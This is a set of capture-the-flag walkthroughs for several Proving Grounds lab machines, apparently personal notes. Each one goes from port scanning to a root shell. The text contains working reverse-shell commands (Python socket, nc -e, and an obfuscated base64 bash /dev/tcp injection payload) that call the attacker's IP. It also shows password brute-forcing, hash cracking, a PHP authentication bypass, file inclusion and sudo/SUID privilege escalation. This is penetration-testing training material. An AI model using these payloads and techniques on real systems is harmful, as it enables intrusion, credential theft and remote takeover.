pg-sunsetdecoy-play

SunsetDecoy

Nmap
sudo nmap 192.168.184.85 -p- -sS -sV 130 
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

First up checking the root page for port 80 takes us to an index page containing a file called save.zip.

Upon downloading the file we are asked for a password to open. Kali comes pre-installed with a John module called zip2john. We can use this to create a hash of the file which can be used for cracking with John.

 
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ zip2john save.zip > hash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ ls
hash save.zip

We can then run John against the hash.

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (save.zip)
1g 0:00:00:00 DONE (2021-09-09 05:12) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]

We can then extract the contents of save.zip. After doing so we extract the /etc/ folder.

Out of these files shadow is of interest the most.

We have passwords hash for the root account and the account ‘296640a3b825115a47b68fc44501c828’. I was unable to crack the root password with a wordlist so instead was able to crack the other account after  unshadow it

┌──(kali㉿puckie)-[~/offsec/SunsetDecoy/etc]
└─$ john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0.02% (ETA: 19:25:07) 0g/s 340.4p/s 680.9c/s 680.9C/s newzealand..blue13
0g 0:00:00:20 0.04% (ETA: 19:14:39) 0g/s 343.0p/s 686.0c/s 686.0C/s bethan..bagpuss
server (296640a3b825115a47b68fc44501c828)
1g 0:00:03:08 0.63% (ETA: 13:41:37) 0.005317g/s 576.4p/s 667.0c/s 667.0C/s 222520..192522
1g 0:00:03:10 0.64% (ETA: 13:40:28) 0.005257g/s 577.3p/s 666.8c/s 666.8C/s sh3lby..sabong
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
We now have the password: server I was then able to login to SSH with the username and password.
┌──(kali㉿puckie)-[~/offsec/SunsetDecoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.187.85 -t "bash --noprofile"

296640a3b825115a47b68fc44501c828@192.168.187.85's password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$

When attempting to run a simple command such as cat we are given the error message: -rbash: cat: command not found.

We fix the $PATH with

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games"
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ cd 296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt 
5ffa884b32351d811cd1314c366c6098

Once in we have a more usable shell. We can then run a Python reverse shell to create another shell connection this should get us more usable.

/usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.49.184”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’

Once in the new shell export a new path so we have use of commands easily.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

After enumerating the machine for a while I was unable to find points of escalation. I then transferred over pspy64 and let it run.

chmod +x pspy64
./pspy64

Soon after running we get a huge amount of entries for chkrootkit-0.49.

Researching on Google shows a local privilege escalation exploit with this version and below:

Chkrootkit 0.49 – Local Privilege Escalation
Chkrootkit 0.49 – Local Privilege Escalation. CVE-2014-0476CVE-107710 . local exploit for Linux platform
www.exploit-db.com

Essentially this will execute a binary in /tmp/update. We can create update as a reverse shell and when executed should give us a root shell.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
/usr/bin/nc 192.168.49.187 4444 -e /bin/sh
Make it executable:
chmod +x /tmp/update

Then open a netcat listener to the specified port and we should land a root shell.

But Only after we start ( the file is in users’s home dir, so user has all permissions there)

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -la
total 60
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Sep 9 06:04 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp


296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$

.

┌──(kali㉿puckie)-[~/offsec]
└─$ sudo nc -nlvp 4444 
listening on [any] 4444 ...
connect to [192.168.49.187] from (UNKNOWN) [192.168.187.85] 35942
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 36
drwx------ 3 root root 4096 Sep 9 05:07 .
drwxr-xr-x 18 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Sep 9 05:08 proof.txt
-rw-r--r-- 1 root root 32 Aug 27 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020 script.sh
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
cat proof.txt
80a4a1e86a9094a469a78902c269d6bb
cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
    /root/chkrootkit-0.49/chkrootkit
else
    echo "An AV scan will not be launched."
fi

.
Explained:
pwd
/var/spool/cron/crontabs
cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.V4fwaR/crontab installed on Tue Jul 7 16:44:59 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
--snip--
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h dom mon dow command
* * * * * /bin/bash /root/script.sh
.

pg-samurai-play

Samurai

Nmap
sudo nmap 192.168.104.90 -p- -sS -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
7080/tcp open ssl/empowerid LiteSpeed
7601/tcp open http Apache httpd 2.4.38 ((Debian))
8088/tcp open http LiteSpeed httpd
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Starting off on this machine we find that port 80 is restricted by a HTTP-basic-auth login.

I decided against bruteforcing for the moment and move straight on to other ports on the machine. Looking at port 445 for SMB I run enum4linux against the target and discovered some user accounts.

enum4linux -u ” -p ” -a 192.168.104.90

We have discovered the following users:

  • seppuku

  • samurai

  • tanto

Otherwise with no open shares on SMB we move onto enumerating port 7601 of which in the browser takes us to the following below:

Running dirsearch.py against this port reveals the /keys/ directory.

python3 dirsearch.py -u http://192.168.104.90:7601 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 –full-url

Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed to id_rsa and used chmod to set appropriate permissions.

chmod 600 id_rsa

Knowing of the three users on the target machine we can guess and login to SSH. I was able to login with the user tanto.

ssh -i id_rsa tanto@192.168.172.90

Once logged in as tanto we see we are restricted in rbash and unable to run some commands. I used the following command sequence to first escape rbash then export a new path then finally updated to a Python shell again.

python -c ‘import os; os.system(“/bin/sh”)’
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c ‘import pty; pty.spawn(“/bin/bash”)’

Once we can move around the box again I moved into the seppuku users directory. The file .passwd is of interest and contains the password: 12345685213456!@!@A

This password did not work for the user seppku but I was able to use su and the password to login as the user samurai.

I then transferred linpeas over to the attacking machine which soon picked up sudo permissions.

Open another tab and log in as tanto on SSH again. The create the directory and file so we can execute as the user samurai. Once the directory and bin file has been created echo in a bash shell then chmod to make it executable.

mkdir .cgi_bin
cd .cgi_bin
echo ‘/bin/bash’ > bin
chmod 755 bin

Then on our other tab execute the file with the following command to gain root shell:

sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

pg-pyexp-play

PyExp

Nmap
sudo nmap 192.168.75.118 -p- -sS -sV
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
3306/tcp open mysql MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

With only SSH and MySQL open we can start bruteforcing MySQL. As the root account generally always exists we can start by bruteforcing this using the rockyou.txt wordlist.

MySQL Credential Bruteforce

We will attempt to use the Medusa tool with the wordlist rockyou.txt to bruteforce MySQL password for the root user:

kali@kali:~/pyexp$ medusa -h 192.168.61.118 -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 40 -v 4 -f
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT FOUND: [mysql] Host: 192.168.61.118 User: root Password: prettywoman [SUCCESS]
kali@kali:~/pyexp$
With the valid credentials of root:prettywoman we can now login to MySQL.
mysql -u root -p -h 192.168.75.118

Viewing available databases we find the database ‘data’ which contains a table called ‘fernet’. This table contains a token and key as shown below.

The values are:

cred
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
keyy
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

I tried decoding these with base64 and a few others. No luck with any legible output. Researching the words fernet and encode give us the following result: https://asecuritysite.com/encryption/ferdecode

Entering the details we have found give the results below.

https://asecuritysite.com/encryption/ferdecode

These credentials returned are: lucy:wJ9`"Lemdv9[FEw- Which allow us to login with SSH as the user lucy.

ssh -p 1337 lucy@192.168.75.118

Checking sudo permissions with sudo -l shows we can run /usr/bin/python2 /opt/exp.py as root without specifying a password.

Reading the contents of /opt/exp.py:

uinput = raw_input(‘how are you?’)
exec(uinput)

Looks like this script will ask us a question which prompts raw input. If we can escape the shell whilst the script is active we should be able to maintain escalated privileges. Use the command below to escape the shell when prompted for input.

import os; os.system(“/bin/sh”)

pg-potato-play

Exploitation Guide for Potato
Summary

This machine is exploited via bypassing PHP authentication, local file inclusion vulnerability, and weak user credentials. It is escalated by abusing misconfiguration of sudo permissions.
Enumeration
Nmap

We start off by running an nmap scan against all TCP ports:

kali@kali:~$ sudo nmap -p- 192.168.120.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-25 08:48 EDT
Nmap scan report for 192.168.120.58
Host is up (0.038s latency).
Not shown: 1997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2112/tcp open kip

We can further enumerate port 2112 with a more detailed scan:

kali@kali:~$ sudo nmap -p 2112 192.168.120.58 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-25 08:55 EDT
Nmap scan report for 192.168.120.58
Host is up (0.030s latency).

PORT STATE SERVICE VERSION
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg

We see ProFTPD running on port 2112, and the server allows for anonymous authentication. In addition, we can see two files of interest: index.php.bak and welcome.msg.
Gobuster

Navigating to port 80 (http://192.168.120.58/) doesn’t show anything useful, but we can use gobuster to bruteforce the site’s directories:

kali@kali:~$ gobuster dir -u http://192.168.120.58 -w /usr/share/wordlists/dirb/common.txt -z
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
...
/.hta (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/.htaccess (Status: 403)
/index.php (Status: 200)
/server-status (Status: 403)
...

This scan shows us the directory /admin. If we navigate there (http://192.168.120.58/admin/), we are greeted with a login control. Trying some easy or default passwords does not prove useful.
Exploitation
Anonymous FTP Server

Since we discovered that the ProFTPD server supports anonymous authentication and saw a couple of files hosted there, we can try retrieving them for inspection:

kali@kali:~$ ftp 192.168.120.58 2112
Connected to 192.168.120.58.
220 ProFTPD Server (Debian) [::ffff:192.168.120.58]
Name (192.168.120.58:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.118.3 !
...
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg
226 Transfer complete
ftp> 
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
200 PORT command successful
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
226 Transfer complete
901 bytes received in 0.00 secs (14.3210 MB/s)
ftp> 
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
200 PORT command successful
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
226 Transfer complete
54 bytes received in 0.00 secs (994.9882 kB/s)
ftp> 
ftp> bye
221 Goodbye.
kali@kali:~$

File welcome.msg does not have anything of value to us; however, file index.php.bak does.
PHP Type Juggling and Authentication Bypass

The index backup file contains these lines of interest:

<?php

$pass= “potato”; //note Change this password regularly

if($_GET[‘login’]===”1″){
if (strcmp($_POST[‘username’], “admin”) == 0 && strcmp($_POST[‘password’], $pass) == 0) {
echo “Welcome! </br> Go to the <a href=\”dashboard.php\”>dashboard</a>”;
setcookie(‘pass’, $pass, time() + 365*24*3600);
}else{
echo “<p>Bad login/password! </br> Return to the <a href=\”index.php\”>login page</a> <p>”;
}
exit();
}
?>

Although we notice the default password in the statement$pass= “potato”;, the admin password has been changed. Of particular importance is line 10:

if (strcmp($_POST[‘username’], “admin”) == 0 && strcmp($_POST[‘password’], $pass) == 0) {

OWASP has a very informative document that explains a possible PHP type juggling attack vector against a check like this.

In PHP, there exist two types of comparisons: strict comparisons (that use syntax ===) and loose comparisons (that use syntax ==). The differences in their evaluation matter a great deal, especially where it concerns PHP Type Juggling.
Looking at the source code, we see the PHP string comparator function strcmp is used to compare the username to the string admin and the password to the variable $pass.

The function strcmp accepts two parameters, both of which must be of type string. If we play around with this function, we will notice that it really dislikes when the parameters are not strings. In particular, the function will give up and return NULL if a parameter is an array:

kali@kali:~$ php -a
Interactive mode enabled

php > $test = strcmp(array(), "password");
PHP Warning: strcmp() expects parameter 1 to be string, array given in php shell code on line 1
php > echo $test === NULL;
1
php >

Testing this further, we see that NULL actually equals the integer 0 when using loose comparison (==) – as is the case in the backup file:

php > echo (NULL == 0);
1
php >

Had the application employed strict comparisons, this vulnerability would not exist. Because we fully control the password POST variable $_POST[‘password’], we are able to intercept the request and change it to an empty array.
As a result, expression strcmp($_POST[‘password’], $pass) would evaluate to NULL and, because of the loose comparison, the check strcmp($_POST[‘password’], $pass) == 0 would pass, essentially bypassing authentication entirely.

Next, we will set up our web browser to use Burp proxy and intercept the login request:

POST /admin/index.php?login=1 HTTP/1.1
Host: 192.168.120.58
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.120.58/admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: close
Upgrade-Insecure-Requests: 1

username=admin&password=test

We will change the intercepted request to the following before forwarding it to the server:

POST /admin/index.php?login=1 HTTP/1.1

username=admin&password[]=””

As a result, we have successfully bypassed authentication and are redirected to http://192.168.120.58/admin/index.php?login=1, where we are greeted with the following:

Welcome!
Go to the dashboard

We will follow the link and navigate to the dashboard page (http://192.168.120.58/admin/dashboard.php) where we see five additional links: Home, Users, Date, Logs, and Ping.
LFI Vulnerability

Still using Burp proxy, we will investigate these pages while observing requests sent to the server. The Logs page (http://192.168.120.58/admin/dashboard.php?page=log) functionality should catch our attention. We see three log files listed here: log_01.txt, log_02.txt, and log_03.txt. If we select one of these logs and click Get the log button, the POST request would look like this:

POST /admin/dashboard.php?page=log HTTP/1.1

file=log_01.txt

We observe the file POST parameter in the request, and it hints at the possibility of a local file inclusion vulnerability. Swapping the intercepted POST data with file=../../../../../etc/passwd confirms this, and we get the contents of /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash

Password Cracking

We will attempt to crack the recovered password hash for user webadmin with john and the default wordlist:

kali@kali:~$ cat pass.txt 
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
kali@kali:~$ 
kali@kali:~$ john pass.txt
...
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
dragon (webadmin)
1g 0:00:00:00 DONE 2/3 (2020-09-25 10:08) 33.33g/s 35933p/s 35933c/s 35933C/s 123456..knight
...

The password cracker comes back with the password dragon.
SSH

We can now SSH into the machine with credentials webadmin:dragon:

kali@kali:~$ ssh webadmin@192.168.120.58
webadmin@192.168.120.58's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
...
webadmin@serv:~$ id
uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin)
webadmin@serv:~$

Escalation
Sudo Enumeration

Checking our sudo permissions shows that we are able to run all files in the /notes directory using /bin/nice:

webadmin@serv:~$ sudo -l
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*
webadmin@serv:~$

Checking permissions on /notes, we are unable to write to that directory:

webadmin@serv:~$ ls -lah /notes/
total 16K
drwxr-xr-x 2 root root 4.0K Aug 2 19:11 .
drwxr-xr-x 21 root root 4.0K Sep 20 16:18 ..
-rwx------ 1 root root 11 Aug 2 19:11 clear.sh
-rwx------ 1 root root 8 Aug 2 19:11 id.sh
webadmin@serv:~$

However, we can use a directory traversal trick to bypass this restriction. First, create a file in the home directory that we would like to run and give it executable permissions:

webadmin@serv:~$ pwd
/home/webadmin
webadmin@serv:~$ echo "/bin/bash" > pwn.sh
webadmin@serv:~$ cat pwn.sh 
/bin/bash
webadmin@serv:~$ chmod +x pwn.sh
webadmin@serv:~$

We can now use the following path to our file, bypassing the directory write restriction and granting us a root shell:

webadmin@serv:~$ whoami
webadmin
webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/pwn.sh 
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)
root@serv:/home/webadmin#

.

Explained:

root@serv:/# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root ALL=(ALL:ALL) ALL

webadmin ALL=(ALL:ALL) /bin/nice /notes/*
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
root@serv:/#

.

 

pg-photographer-play

Photographer

Nmap
sudo nmap 192.168.121.76 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I started this box with checking SMB. First I ran the following command with smbclient to list shares.

smbclient -L “//192.168.121.76/” -U “guest”%

Taking note of the non default share ‘sambashare’ I connected with smbclient again, this time specifying that share that has been identified. After connecting I tried to upload with the put command and was given ‘access denied. I grabbed the two files on the share and then disconnected.

smbclient “//192.168.121.76/sambashare” -U “guest”%

Checking the contents of mailsent.txt reveals a user ‘daisa’. We also have the sender who is called ‘agi’ who may be a potential user. The comment regarding the secret is interesting and something we may be able to use later.

I checked the contents of wordpress.bkg.zip and was unable to identify any interesting information. Unfortunately the archive file did not contain a wp-config.php file which normally contains database information.

Checking port 80 we come to a website called ‘photographer’. I ran directory enumeration on this page and enumerated manually and was unable to discover anything of interest.

Moving over to port 8000 we land on what is assumed to be the web page which was mention in Agi’s email to Daisa. Noting from the footer the website is built with Koken.

I checked manually for common directories and was presented with a login page under the directory /admin.

Knowing Daisa likely has account on this as per the email we grabbed from SMB I entered the email address as ‘daisa@photographer.com’. For the password I tried ‘babygirl’ which was hinted from the email as well. Fortunately this gave us access.

Using the settings tab we take note we are run on version 0.22.24.

A simple search with searchsploit reveals ‘Arbitrary File Upload (Authenticated)’ for this particular version.

The exploit for this has been linked below.

Koken CMS 0.22.24 – Arbitrary File Upload (Authenticated)
Koken CMS 0.22.24 – Arbitrary File Upload (Authenticated).. webapps exploit for PHP platform
www.exploit-db.com

As per the exploit instructions I went to ‘Import Content’ in the bottom right of the page.

I then selected a PHP shell which I had renamed to phpshell.php.jpg in order to bypass the upload filter. After selecting and uploading I caught the upload request with Burpsuite.

On the highlighted line above I removed ‘.jpg’ from the end of the file name. After forwarding the request go back to Koken and look under the ‘Date Published’ section and find the uploaded file. Highlight the file and select ‘Download File’ on the right.

This will execute the PHP reverse shell and we get a shell on our netcat listener.

I then used the following command to make the shell more usable.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

After this I uploaded linpeas to the target machine and executed. Linpeas soon picking up the binary php7.2 has the SUID bit set.

Checking GTFOBins for SUID exploits we see the following:

Using this information I ran the following command to gain shell as root.

/usr/bin/php7.2 -r “pcntl_exec(‘/bin/sh’, [‘-p’]);”

Keywords

<binary:php>

pg-onsystemshelldredd-play

OnSystemShellDredd

Nmap
sudo nmap 192.168.172.130 -p- -sS -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP on the host is open to anonymous login. When logged in use ls -la to view hidden files. Upon moving into the .hannah directory ensure binary mode is enabled then grab the id_rsa.

Ensure to change the permissions on the id_rsa to make it usable.

chmod 600 id_rsa

Then proceed to login as the user hannah specifying port 61000.

ssh -p 61000 -i id_rsa hannah@192.168.172.130

Running linpeas on the target machine after transferring over finds the binary cpulimit has a SUID bit set.

Checking GTFOBins against this binary reports the following:

We can then use the following command to gain a root shell:

/usr/bin/cpulimit -l 100 -f — /bin/sh -p

pg-noname-play

NoName

Nmap
sudo nmap 192.168.64.15 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Checking out the target address shows we land on a page headed ‘Fake Admin Area’. This page has a query box. I was unable to get any output from this or perform any command injection.

/index.php

Further enumeration shows the /admin page being valid. This presents that page below.

/admin

Nothing interesting here but we do have something in the page source.

/admin

So far nowhere for this to be used but we can take a note of this. I decided from here to run some more specific enumeration against the target. Running dirsearch.py to append .txt and .php to end of a wordlist I was able to identify the /superadmin.php webpage.

python3 dirsearch.py -u http://192.168.64.15/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 75 –full-url –suffix=.txt,.php

So far this looks the same as the other page almost but we can actually test to see if the ping function works.

/superadmin.php

Running tcpdump on our attacking machine to listen in on the interface tun0 for ICMP packets we can ping our attacking machine and can confirm if we take receipt of ICMP packets.

Start tcpdump:

sudo tcpdump -i tun0 icmp

Then after pinging our attacking machine from the web interface we see results which show ping is working.

Ideally we need to perform some form of command injection. Testing with the interface shows we need a IP at the begging of the command regardless. The linked GitHub has a large amount of command injection techniques to try: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

After some testing I found the following to work:

<IP> | <Command>

Switching over to Burpsuite we can see the value 192.168.49.79 | id was sent as a query and returned valid results in the response.

From here I ran the following command in a terminal to generate double base64 encoded output.

echo “echo $(echo ‘bash -i >& /dev/tcp/192.168.49.79/80 0>&1’ | base64 | base64)|ba”se”6”4 -”d|ba”se”64 -”d|b”a”s”h” | sed ‘s/ /${IFS}/g’
#Output
echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqYzVMemd3SURBK0pqRUsK|ba”se”6”4${IFS}-”d|ba”se”64${IFS}-”d|b”a”s”h

Then encoded the output combined with the ping part of the command with Burpsuite encoder.

Then submitted the URL encoded value as a parameter in Burpsuite.

Resulting in a reverse shell on our netcat listener.

From here I then transferred over linpeas which after running found the binary ‘find’ has the SUID bit set.

Searching GTFOBins we find this can be used to spawn a root shell.

I then run the following command to gain a root shell.

/usr/bin/find . -exec /bin/sh -p \; -quit

pg-my-cmsms-play

My-CMSMS

Nmap
sudo nmap 192.168.152.74 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 8.0.19
33060/tcp open mysqlx?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking out port 80 takes us to the default page for CMS made simple.

I then run dirsearch.py against the host which also discovered phpmyadmin which was locked behind http-basic-auth.

